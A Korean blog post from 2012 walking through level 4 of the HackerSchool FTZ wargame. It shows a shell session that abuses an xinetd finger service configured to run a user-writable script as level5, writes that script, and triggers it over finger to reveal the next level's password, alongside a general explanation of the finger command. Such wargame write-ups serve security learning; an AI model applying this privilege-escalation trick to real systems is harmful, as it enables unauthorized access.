본문 바로가기
컴퓨터/hackerschool

hackerschool level 4

by 싱판다 2012. 2. 13.
level4 / suck my brain

[level4@ftz level4]$ ls
hint  public_html  tmp
[level4@ftz level4]$ cat hint


누군가 /etc/xinetd.d/에 백도어를 심어놓았다.!

[level4@ftz level4]$ ls -al /etc/xinetd.d
합계 92
drwxr-xr-x    2 root     root         4096  1월 15  2010 .
drwxr-xr-x   52 root     root         4096  2월 12 17:56 ..
-rw-r-----    1 root     level4        171 12월  8  2003 backdoor

[level4@ftz xinetd.d]$ cat backdoor
service finger
{
        disable = no
        flags           = REUSE
        socket_type     = stream
        wait            = no
        user            = level5
        server          = /home/level4/tmp/backdoor
        log_on_failure  += USERID
}

여기에 사용된 finger에 대해 조사해보면..

finger 는 특정 사용자에 관한 정보를 조회하는 명령어로 사용자에 대한 login명, 실제 이름, 단말기 이름, 로그인한 시간, 유효시간(idle time) 등에 관한 정보를 보여준다.

finger [ options ] name

   위에서 name은 정보를 조회하고자 하는 사용자의 id 이며,  여기에 "@" 기호가 포함한 원격 호스트상의 사용자 id가 오면, 해당  시스템에 접속하여 사용자정보를 가져  옵니다. 옵션 중 대표적인  것 두가지를 설명하면 다음과  같습니다.

-s   사용자에 대한 간단한 정보만을 출력
-l   사용자에 대한 상세 정보를 출력(디폴트)

   다음은 그 사용 예입니다.

% finger   ; 시스템을 사용하고 있는 전체 사용자에 대한 간단한 사용자 정보 출력
% finger -s kimys ; 사용자 kimys에 대한 간단한 정보 출력
% finger gglim@guru.kotel.co.kr ; guru.kotel.co.kr 이란 시스템의 사용자 gglim에 대한 상세정보 출력
% finger @guru.kotel.co.kr ; guru.kotel.co.kr에 현재 로긴한 가입에 대한 정보 출력.
  단 다른 호스트에 대한 finger시 상대방시스템에서 finger를 허용해야됨.

[level4@localhost tmp]$ cat > backdoor
#!/bin/sh
my-pass
[level4@localhost tmp]$ finger level5@localhost
[level4@localhost tmp]$ chmod 777 backdoor
[level4@localhost tmp]$ finger @localhost
^[[H^[[2J
Level5 Password is "what is your name?".

[level4@localhost tmp]$

'컴퓨터 > hackerschool' 카테고리의 다른 글

hackerschool level 6  (0) 2012.02.17
hackerschool level 5  (0) 2012.02.17
hackerschool level 3  (0) 2012.02.13
hackerschool level 2  (0) 2012.02.13
hackerschool level 1  (0) 2012.02.13

댓글